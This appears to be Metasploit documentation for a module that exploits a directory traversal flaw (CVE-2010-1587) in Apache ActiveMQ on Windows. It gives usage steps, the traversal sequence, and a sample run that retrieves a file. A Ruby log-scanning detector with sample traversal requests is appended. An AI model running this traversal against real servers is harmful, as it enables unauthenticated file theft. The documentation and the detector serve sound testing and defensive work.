documentation/modules/auxiliary/scanner/http/apache_activemq_traversal.md
This module exploits a directory traversal vulnerability in Apache ActiveMQ 5.3.1 and 5.3.2 on Windows systems. The flaw exists in the Jetty ResourceHandler that ships with these versions, allowing an unauthenticated attacker to read arbitrary files from the target host.
The vulnerability is tracked as CVE-2010-1587.
To test this module you need a Windows host running one of the affected versions:
bin\activemq.bat to start the broker.

1. use auxiliary/scanner/http/apache_activemq_traversal
2. set RHOSTS [target IP]
3. set RPORT 8161
4. run

FILEPATH: The path of the file to retrieve from the target system, relative to the drive root. The default value is /windows\\win.ini. Backslashes must be used for path separators on Windows targets.

DEPTH: The number of traversal sequences (/\..) to prepend to the request. The default is 4. If the file is not found, try increasing this value.
```
msf > use auxiliary/scanner/http/apache_activemq_traversal
msf auxiliary(scanner/http/apache_activemq_traversal) > set RHOSTS 192.168.1.100
RHOSTS => 192.168.1.100
msf auxiliary(scanner/http/apache_activemq_traversal) > set RPORT 8161
RPORT => 8161
msf auxiliary(scanner/http/apache_activemq_traversal) > run
[*] 192.168.1.100:8161 - Sending request...
[*] 192.168.1.100:8161 - File saved in: /root/.msf4/loot/20250319120000_default_192.168.1.100_apache.activemq_123456.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
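For the detection side, the following added example (not part of the Metasploit module or this documentation) scans web access-log lines for the `/\..` traversal sequence described above. For each hit it reports the traversal depth and whether the server answered 200. The NCSA-style log format, the constructed sample lines, and the helper names `normalise` and `traversal_hits` are assumptions.

```ruby
# Added example: flag access-log entries carrying the "/\.." traversal sequence.
# Log format, sample lines and helper names are assumptions, not ActiveMQ output.

# One traversal step as the page describes it: "/" followed by "\..".
TRAVERSAL_STEP = %r{/\\\.\.}

# NCSA common log format: ip - - [time] "METHOD TARGET PROTO" status size
LOG_LINE = /\A(?<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?<target>\S+) [^"]*" (?<status>\d{3}) /

# Constructed sample input (documentation address ranges).
SAMPLE_LOG = <<~'LOG'.lines
  192.0.2.10 - - [19/Mar/2025:12:00:00 +0000] "GET /\../\../\../\../windows\win.ini HTTP/1.1" 200 92
  192.0.2.10 - - [19/Mar/2025:12:00:05 +0000] "GET /%5c../%5c../boot.ini HTTP/1.1" 404 0
  198.51.100.7 - - [19/Mar/2025:12:01:00 +0000] "GET /admin/queues.jsp HTTP/1.1" 200 5120
  198.51.100.7 - - [19/Mar/2025:12:01:02 +0000] "GET /admin/../index.html HTTP/1.1" 200 710
LOG

# Percent-decode a bounded number of rounds so %5c and %255c both become "\".
def normalise(target, rounds = 3)
  s = target.b
  rounds.times do
    decoded = s.gsub(/%([0-9a-fA-F]{2})/) { Regexp.last_match(1).hex.chr }
    break if decoded == s
    s = decoded
  end
  s
end

# Return one record per request that contains at least one traversal step.
def traversal_hits(lines)
  lines.map do |line|
    m = LOG_LINE.match(line)
    next unless m
    path = normalise(m[:target])
    depth = path.scan(TRAVERSAL_STEP).length
    next if depth.zero?
    # A 200 means the server returned content, so triage those hits first.
    { ip: m[:ip], path: path, depth: depth, served: m[:status] == '200' }
  end.compact
end

traversal_hits(SAMPLE_LOG).each { |hit| puts hit }
```

Matching on the decoded path rather than the raw request line keeps the rule from missing encoded backslashes, and the `served` flag separates probes from requests that returned file content.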